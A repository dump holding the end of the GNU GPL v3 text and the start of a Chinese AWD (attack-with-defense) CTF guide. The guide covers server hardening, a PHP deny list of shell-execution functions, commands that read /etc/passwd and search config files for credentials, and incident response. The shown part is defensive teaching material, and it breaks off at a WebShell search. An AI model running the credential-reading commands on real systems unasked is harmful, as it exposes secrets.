procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 
317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. 
If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 
386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 
421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. 
If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 
486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 
512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. 
If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 
578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 
613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 
651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AWD比赛指导手册 2 | 3 | ### 纸上得来终觉浅,绝知此事要躬行。 4 | 5 | ![AWD-Guide](https://socialify.git.ci/AabyssZG/AWD-Guide/image?description=1&font=Bitter&forks=1&language=1&logo=https%3A%2F%2Favatars.githubusercontent.com%2Fu%2F54609266%3Fv%3D4&owner=1&pattern=Solid&stargazers=1&theme=Dark) 6 | 7 | **手册版本号:V1.2.2-2023/10/21** 8 | 9 | 这是一本能让你从零开始学习AWD并深入AWD的手册,我也会根据经验和需求逐步完善相关内容。如果你要参加AWD相关比赛,相信本项目能给你带来帮助~ 10 | 11 | ### 如何在线阅读? 
12 | 13 | - 个人博客地址: [https://blog.zgsec.cn/archives/484.html](https://blog.zgsec.cn/archives/484.html) 14 | - 微信公众号地址:[https://mp.weixin.qq.com/s/1vR1rcGHK6YYdXlp4McR_w](https://mp.weixin.qq.com/s/1vR1rcGHK6YYdXlp4McR_w) 15 | 16 | **如果你觉得本项目不错,欢迎给我点个Star,万分感谢~~ 有什么新的攻击或者防守的姿势、手法,欢迎与我交流** 17 | 18 | 19 | 20 | ## 0# 什么是AWD 21 | 22 | ### 0.1# AWD赛制介绍 23 | 24 | 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一,该模式常见于线下赛。 25 | 26 | 在该模式中,每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox ),该环境通常运行着一些特定的服务或应用程序,而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞,获取 Flag 以获得积分; 同时,参赛队伍也需要修补自身服务漏洞进行防御,以防被其他队伍攻击和获取 Flag。 27 | 28 | 主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。 29 | 30 | ### 0.2# 比赛整体流程 31 | 32 | - 赛前准备环节:我们会分配到多个靶机服务器,通常是分配给我们 `SSH` 或者 `VNC` 的用户名和密码,还有相关IP等信息 33 | - 安全加固环节:我们需要先自己去登录靶机服务器,进行30分钟的安全加固(源码备份/弱口令修改/代码审计和修复/漏洞修复等) 34 | - 自由攻击环节:安全加固时间过后,开始自由攻击环节,通过对别的队伍的靶机服务器进行攻击(弱口令/Web漏洞/系统漏洞等)获得Flag进行加分,对应队伍失分 35 | 36 | 37 | 38 | ## 1# 比赛环境 39 | 40 | 通常比赛环境有以下三种情况: 41 | 42 | - 混合靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Win靶机 `Windows Server 2003/2008/2012` 或者 `Windows 7` + Linux靶机 `Centos7.x` 或者 `Ubuntu 16.04/17.01/20.04` 43 | - 纯Linux靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Linux靶机 `Centos7.x` 或者 `Ubuntu 16.04/17.01/20.04` 44 | - 纯Windows靶机情况:运维机器 `Windows 10` + 攻击机 `Kali Linux` + Win靶机 `Windows Server 2003/2008/2012` 或者 `Windows 7` 45 | 46 | 可能有师傅这里看不太懂,那我可以用大白话描述一下:比赛的时候,会给你1~2台运维机器(一般是Win10里面装了Kali)以及好几台服务器(也就是上面说的靶机),服务器上面有漏洞,要先抓紧去找到漏洞并修复(可别忘了弱口令哦),再通过找到的漏洞去攻击别的队伍的服务器拿到Flag从而得分 47 | 48 | 49 | 50 | ## 2# 安全加固环节(Defense) 51 | 52 | ### 2.0# 基本加固流程 53 | 54 | #### 2.0.1 Windows加固流程 55 | 56 | 先备份:Web源码、数据库 57 | 58 | 1. 445加固,开启防火墙或IP高级安全策略 59 | 2. 开启系统日志审计功能 60 | 3. 禁用guest账户、关闭文件共享 61 | 4. 确保启动项内容是可控的 62 | 5. 限制3389远程访问控制的连接数:在本地组策略编辑器里面,依次展开计算机配置-->管理模板-->Windows组件-->远程桌面服务-->远程桌面会话主机-->连接-->限制连接的数量 63 | 6. 使用工具监控关键目录文件:文件操作监控.exe、御剑文件监控.exe 64 | 7. 恶意代码文件,通过PCHunter、Monitor查找 65 | 8. Web目录环境查找相关可疑文件:jpg/png/rar,查看属性、解压看文件内容 66 | 9. NTFS扫描磁盘查找隐藏的交换流数据 67 | 10. 
查找系统所有账户信息,禁止非Administrator账户 68 | 11. 修改Web站点管理员访问路径、默认口令、数据库口令 69 | 12. 安装WAF脚本,防护Web站点,禁止其他漏洞 70 | 71 | #### 2.0.2 Linux加固流程 72 | 73 | 先备份:Web源码、数据库 74 | 75 | 1. 系统口令修改,团队统一口令 76 | 2. 通过 `.bash_history` 查找历史命令操作,发现痕迹 77 | 3. 查看计划任务:`crontab -l`;编辑计划任务:`crontab -e` 78 | 4. 查看 `/etc/init.d/rc.local` 中启动服务有无异常 79 | 5. 使用脚本开启进程监控、目录监控、流量监控 80 | 6. Web站点口令,站点管理员路径修改 81 | 7. 系统加固:iptables 82 | 83 | ### 2.1# 基本信息搜集 84 | 85 | 在防守的时候,信息搜集也很重要,正所谓“知己知彼,百战不殆” 86 | 87 | #### 2.1.1 明确Linux机器信息 88 | 89 | ```c 90 | uname -a //系统信息 91 | ps -aux //查询进程信息 92 | ps -ef | grep 进程名称 //筛选指定进程 93 | id //用于显示用户ID,以及所属群组ID 94 | cat /etc/passwd //查看用户情况 95 | ls /home/ //查看用户情况 96 | find / -type d -perm -002 //可写目录检查 97 | ifconfig //Linux上查看网卡信息 98 | ip addr show //Linux上查看网卡信息 99 | ``` 100 | 101 | #### 2.1.2 明确Windows机器信息 102 | 103 | ```c 104 | whoami /all //Windows上查看用户详细信息 105 | ipconfig /all //Windows上查看网卡信息 106 | ``` 107 | 108 | #### 2.1.3 查看开放端口 109 | 110 | ```c 111 | netstat //查看活动连接 112 | netstat -ano/-a //查看端口情况 113 | netstat -anp //查看端口 114 | firewall-cmd --zone=public --remove-port=80/tcp --permanent //关闭端口(--permanent 写入的规则需 reload 后才生效) 115 | firewall-cmd --reload //防火墙重载配置 116 | ``` 117 | 118 | #### 2.1.4 默认口令(弱口令)更改 119 | 120 | 为了防范弱口令攻击,Mysql密码默认都是root,phpstudy默认密码123456 121 | 122 | 还有其他默认密码admin,top100, top1000等 123 | 124 | **尤其是WEB应用的后台密码修改** 125 | 126 | ```c 127 | passwd username //ssh口令修改 128 | set password for mycms@localhost = password('18ciweufhi28746'); //MySQL密码修改 129 | find /var/www/html -path '*config*' //查找配置文件中的密码凭证 130 | ``` 131 | 132 | #### 2.1.5 找本地Flag 133 | 134 | ```c 135 | grep -r "flag" /var/www/html/ //Linux:在Web目录下查找flag 136 | findstr /s /i "flag" *.* //Windows:当前目录以及所有子目录下的所有文件中查找"flag"这个字符串 137 | ``` 138 | 139 | #### 2.1.6 设置禁Ping 140 | 141 | ```c 142 | echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all //临时开启禁ping 143 | echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all //关闭禁ping 144 | ``` 145 | 146 | ### 2.2# Web安全加固 147 | 148 | #### 2.2.1 备份源码 149 | 150 | 
防止在对源码进行修改时出问题,或者被攻击方删除源码而准备 151 | 152 | 压缩源码: 153 | 154 | ```C 155 | tar -cvf web.tar /var/www/html 156 | zip -q -r web.zip /var/www/html 157 | ``` 158 | 159 | 解压缩源码: 160 | 161 | ```C 162 | tar -xvf web.tar -C /var/www/html 163 | unzip web.zip -d /var/www/html 164 | ``` 165 | 166 | 备份源码: 167 | 168 | ```C 169 | mv web.tar /tmp 170 | mv web.zip /home/xxx 171 | ``` 172 | 注意:`/tmp` 以及 Web 进程用户可读写的目录,拿到 WebShell 的攻击者同样能读取或删除其中的备份,建议再通过 scp 拷贝一份到运维机本地 173 | 上传和下载源码: 174 | 175 | ```c 176 | scp username@servername:/path/filename /tmp/local_destination //从服务器下载单个文件到本地 177 | scp /path/local_filename username@servername:/path //从本地上传单个文件到服务器 178 | scp -r username@servername:remote_dir/ /tmp/local_dir //从服务器下载整个目录到本地 179 | scp -r /tmp/local_dir username@servername:remote_dir //从本地上传整个目录到服务器 180 | ``` 181 | 182 | #### 2.2.2 设置只读权限 183 | 184 | 对Web文件设置只读和执行权限(PHP等动态语言需要执行权限) 185 | 186 | ```c 187 | chmod 0555 /var/www/html/* 188 | chmod 0555 /var/www/html/*.php 189 | ``` 190 | 191 | Web根目录设置只读和执行权限 192 | 193 | ```c 194 | chmod 0555 /var/www/html 195 | ``` 196 | 197 | 改变文件的属主和属组来设置严格的权限 198 | 199 | ```c 200 | chown -R root:root /var/www/html/ //设置拥有人为 root:root 或 httpd:httpd (推荐) 201 | chown -R apache:apache /var/www/html/ //确保 apache 拥有 /var/www/html/ 202 | ``` 203 | 204 | #### 2.2.3 配置 `.htaccess` 205 | 206 | 利用 `.htaccess` 配置文件禁止php文件执行 207 | 208 | ```php 209 | <Directory "/path/to/protected_dir"> //指定目录后续的指令将应用于该目录(路径为占位符,按实际目录填写) 210 | Options -ExecCGI -Indexes //禁用了目录中的 CGI 执行和目录索引(显示目录内容列表)功能。 211 | AllowOverride None //不允许在该目录中使用 .htaccess 文件来覆盖服务器的配置。 212 | RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml 213 | RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml 214 | //这两个指令移除指定文件扩展名的处理器和类型。 215 | //在这种情况下,这些指令从 Apache 的处理列表中移除了与 PHP 相关的扩展名和服务器端包含(SSI)文件类型。 216 | php_flag engine off //这个指令将 PHP 的引擎标志(engine)设置为关闭状态,从而禁用了在该目录中执行 PHP 脚本的能力。 217 | <FilesMatch "\.(php|phtml|php3|pht|php4|php5|php7|shtml)$"> 218 | deny from all 219 | </FilesMatch> //这三行命令使用正则表达式匹配了以 .php、.phtml、.php3、.pht、.php4、.php5、.php7、.shtml 结尾的文件,并将其访问权限设置为拒绝所有(Apache 2.4 对应写法为 `Require all denied`) 220 | </Directory> 221 | ``` 222 | 223 | #### 2.2.4 PHP参数安全配置 224 | 225 | 首先找到PHP的配置文件 226 | 227 | ```c 228 | /etc/php/{version}/php.ini 
229 | ``` 230 | 231 | 禁用高危函数 232 | 233 | ```php 234 | disable_functions = dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link 235 | ``` 236 | 237 | 配置 `open_basedir` (将用户访问文件的活动范围限制在指定的区域) 238 | 239 | ```php 240 | open_basedir=/var/www/html 241 | ``` 242 | 243 | 禁用魔术引号(魔术引号会自动对外部来源数据进行转义,但并不能可靠地防止SQL注入,且自 PHP 5.4 起已被移除;防注入应依靠参数化查询) 244 | 245 | ```php 246 | magic_quotes_gpc = Off 247 | ``` 248 | 249 | 关闭PHP伪协议 250 | 251 | ```php 252 | allow_url_fopen = Off 253 | allow_url_include = Off 254 | ``` 255 | 256 | 重启PHP 257 | 258 | ```c 259 | sudo service php7.0-fpm restart 260 | sudo systemctl restart php7.0-fpm.service 261 | ``` 262 | 263 | ### 2.3# 数据库安全加固 264 | 265 | #### 2.3.1 Mysql加固 266 | 267 | 为了防范弱口令攻击,Mysql密码默认都是root,phpstudy默认密码123456 268 | 269 | 1. 不使用默认口令,修改成复杂的,并确保和web环境连接 270 | 2. 设置只允许本地127.0.0.1账户登录:修改 `bind-address=127.0.0.1` ;在配置文件中加入 `secure_file_priv=NULL` 271 | 3. 开启日志审计功能:`general_log=ON` 并指定 `general_log_file=`路径 272 | 273 | 因为最常用的是Mysql数据库,所以基本的攻防大部分都是用MySql数据库的命令 274 | 275 | 备份指定数据库: 276 | 277 | ```sql 278 | mysqldump -u username -ppassword databasename > target.sql 279 | ``` 280 | 281 | 备份所有数据库: 282 | 283 | ```sql 284 | mysqldump -u username -ppassword --all-databases > all.sql 285 | ``` 286 | 287 | 导入数据库: 288 | 289 | ```sql 290 | mysql -u username -ppassword database < from.sql 291 | ``` 292 | 293 | 对于MySQL的攻防,可以看这篇文章:[https://blog.zgsec.cn/archives/26.html](https://blog.zgsec.cn/archives/26.html) 294 | 295 | MySQL默认配置文件路径: 296 | 297 | ``` 298 | C:\\Program Files\MySQL\MySQLServer 5.1\my.ini //Windows 299 | /etc/my.cnf //Linux 300 | /etc/mysql/my.cnf //Linux 301 | ``` 302 | 303 | 修改 `secure_file_priv` 参数(限制 `load_file()`、`INTO OUTFILE` 等文件读写可访问的目录;注意设为 `""` 表示不做任何限制,加固时应设为 `NULL` 或一个专用目录;该参数为只读,修改后需重启 MySQL 才生效) 304 | 305 | ```sql 306 | secure_file_priv="" 307 | ``` 308 | 309 | 重载MySQL权限表 310 | 311 | ```sql 312 | FLUSH PRIVILEGES 313 | ``` 314 | 315 | 重启MySQL服务 316 | 317 | ```c 318 | sudo service mysql restart 319 | sudo systemctl restart mysql 320 | ``` 321 | 322 | #### 2.3.2 Mssql加固 323 | 324 | 1. 删除不必要的账号 325 | 2. SQLServer用户口令安全 326 | 3. 
根据用户分配帐号避免帐号共享 327 | 4. 分配数据库用户所需的最小权限 328 | 5. 网络访问限制 329 | 6. SQLServer登录审计 330 | 7. SQLServer安全事件审计 331 | 8. 配置日志功能 332 | 333 | ### 2.4# 远程控制加固 334 | 335 | #### 2.4.1 SSH安全加固 336 | 337 | 限制IP登录方法 338 | 339 | ```c 340 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 341 | AllowUsers username@192.168.0.100 //找到并编辑以下行,确保其取消注释并设置为所需的IP地址 342 | ``` 343 | 344 | 禁用 `root` 远程登录 345 | 346 | ```c 347 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 348 | PermitRootLogin no //将PermitRootLogin设置为“no” 349 | ``` 350 | 351 | 按用户和组限制SSH登录 352 | 353 | ```c 354 | sudo nano /etc/ssh/sshd_config //以root权限编辑SSH配置文件 355 | AllowUsers testuser //设置只允许 testuser 登录SSH 356 | AllowUsers testuser@192.168.1.100 //设置只允许 192.168.1.100 的机器用 testuser 账户登录SSH 357 | AllowGroups test //设置用户组白名单 358 | //需要注意的是:如果同时指定了 AllowUsers 与 AllowGroups 那么必须要在两个选项中都匹配到的用户才能进行SSH登录 359 | ``` 360 | 361 | 重启SSH服务(重启前先用 `sshd -t` 检查配置语法,并保留当前会话、另开一个终端验证能登录,避免把自己锁在外面) 362 | 363 | ```c 364 | sudo service sshd restart 365 | sudo systemctl restart sshd.service 366 | ``` 367 | 368 | #### 2.4.2 RDP远程登录安全加固 369 | 370 | 删除默认帐户并手动添加新用户: 371 | 372 | - 步骤1:按 `Win + R` 打开运行对话框,输入 `secpol.msc` 并单击 “确定” 373 | - 步骤2:导航至此处:本地策略-->用户权限分配,再双击打开 “允许通过远程桌面服务登录” 374 | - 步骤3:删除此窗口中列出的管理员和远程桌面用户(或计算机上的任何其他用户或组) 375 | - 步骤4:之后单击 “添加用户或组” 并手动添加您要授予远程桌面访问权限的用户 376 | 377 | 更改默认RDP端口号: 378 | 379 | - 步骤1:打开运行对话框,输入 `regedit` 并单击 “确定” 380 | - 步骤2:打开 `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp` ,向下滚动并找到 `PortNumber` 然后双击它 381 | - 步骤3:选择 “十进制”,修改为您想要设置的端口号,然后单击 “确定” 382 | 383 | ### 2.5# 应急响应 384 | 385 | #### 2.5.1 查询进程线程 386 | 387 | ```c 388 | netstat 389 | ps -aux 390 | netstat -apt 391 | ``` 392 | 393 | #### 2.5.2 杀掉进程 394 | 395 | ```c 396 | kill -9 pid //Linux上 397 | taskkill /f /pid pid //Windows上 398 | ``` 399 | 400 | #### 2.5.3 搜索WebShell文件 401 | 402 | ```c 403 | find /var/www/html -name '*.php' -mmin -5 